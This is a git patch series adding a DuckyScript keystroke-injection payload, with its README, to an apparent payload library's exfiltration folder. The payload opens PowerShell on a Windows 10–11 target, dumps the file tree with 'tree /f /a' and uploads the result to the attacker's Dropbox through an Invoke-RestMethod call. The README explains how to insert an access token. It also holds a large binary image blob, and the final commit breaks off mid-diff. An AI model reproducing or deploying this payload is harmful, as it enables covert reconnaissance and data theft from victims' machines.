From ba25f963ca0dad123e27397b34c38bb1df0c93fb Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:43:29 +0200 Subject: [PATCH 1/4] Tree Structure Of The Operating System --- .../payload.txt | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt new file mode 100644 index 0000000..88e06d1 --- /dev/null +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt @@ -0,0 +1,46 @@ +REM ########################################################### +REM # | +REM # Title : Tree Structure Of The Operating System | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ########################################################### + + +REM Requirements: +REM - Internet connection + + +GUI r +DELAY 1000 +STRING PowerShell +ENTER +DELAY 1000 + +STRINGLN tree /f /a > out.txt + +REM It depends byt the content and by the path choosen +DELAY 5000 + +$filePath = ".\out.txt" + +REM Setting about exfiltration +STRING $accessToken = +STRING DROPBOX_ACCESS_TOKEN +ENTER + +STRINGLN + $authHeader = @{Authorization = "Bearer $accessToken"} + $dropboxFilePath = "/out_exported.txt" + + $uploadUrl = "https://content.dropboxapi.com/2/files/upload" + + $headers = @{} + $headers.Add("Authorization", "Bearer $accessToken") + $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}') + $headers.Add("Content-Type", "application/octet-stream") + + Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit; +END_STRINGLN From ad0fa4d3ad50e9327f843ce9a7ee53301b75c106 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 14:44:12 +0200 Subject: [PATCH 2/4] readme --- .../1.png | Bin 0 -> 16141 bytes .../README.md | 32 ++++++++++++++++++ 2 files changed, 32 insertions(+) create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png create mode 100644 payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png new file mode 100644 index 0000000000000000000000000000000000000000..a932623518a4ba0a0089beef463e168e14ce580a GIT binary patch literal 16141 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 out.txt` that permit to list the file name and not only the directories, using text characters instead of graphic characters to display rows linking subdirectories. Save all the output in the out.txt file and then send this file through Dropbox. + +## Dependencies + +* Firefox must be installed + +## Settings + +- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. + + `DEFINE DROPBOX_ACCESS_TOKEN "example"` + +- The path to check can be changed putting the full-path `tree /f /a > out.txt`. + + - `tree \ /f /a > out.txt` + - `tree C:\Users\Aleff\Documents /f /a > out.txt` + +- It depends byt the content and by the path choosen + + `DELAY 5000` \ No newline at end of file From d5ea63685022d62cd0b86f6b0b121ef4a5f4f4cc Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 13:54:07 -0400 Subject: [PATCH 3/4] Update payload.txt --- .../Tree_structure_of_the_operating_system/payload.txt | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt index 88e06d1..39fa8f0 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt @@ -8,11 +8,9 @@ REM # Target : Windows 10-11 | REM # | REM ########################################################### - REM Requirements: REM - Internet connection - GUI r DELAY 1000 STRING PowerShell @@ -31,7 +29,7 @@ STRING $accessToken = STRING DROPBOX_ACCESS_TOKEN ENTER -STRINGLN +STRINGLN_BLOCK $authHeader = @{Authorization = "Bearer $accessToken"} $dropboxFilePath = "/out_exported.txt" From 23658aff0815673bf07062ac0a3a8c10ff3ac8b3 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 21:31:51 +0200 Subject: [PATCH 4/4] Update payload --- .../README.md | 10 +++------ .../payload.txt | 21 +++++++------------ 2 files changed, 10 insertions(+), 21 deletions(-) diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md index 738eeb5..3dca4d7 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md @@ -18,15 +18,11 @@ Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list ## Settings -- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. +- You must define your Dropbox accessToken or modify the exfiltration modality. - `DEFINE DROPBOX_ACCESS_TOKEN "example"` + `DEFINE #DROPBOX_ACCESS_TOKEN example` - The path to check can be changed putting the full-path `tree /f /a > out.txt`. - `tree \ /f /a > out.txt` - - `tree C:\Users\Aleff\Documents /f /a > out.txt` - -- It depends byt the content and by the path choosen - - `DELAY 5000` \ No newline at end of file + - `tree C:\Users\Aleff\Documents /f /a > out.txt` \ No newline at end of file diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt index 88e06d1..0926faf 100644 --- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt +++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt @@ -12,26 +12,19 @@ REM ########################################################### REM Requirements: REM - Internet connection +REM Set yout Dropbox access token +DEFINE #DROPBOX_ACCESS_TOKEN example GUI r DELAY 1000 -STRING PowerShell -ENTER +STRINGLN PowerShell DELAY 1000 -STRINGLN tree /f /a > out.txt - -REM It depends byt the content and by the path choosen -DELAY 5000 - -$filePath = ".\out.txt" - REM Setting about exfiltration -STRING $accessToken = -STRING DROPBOX_ACCESS_TOKEN -ENTER - -STRINGLN +STRINGLN_BLOCK + tree 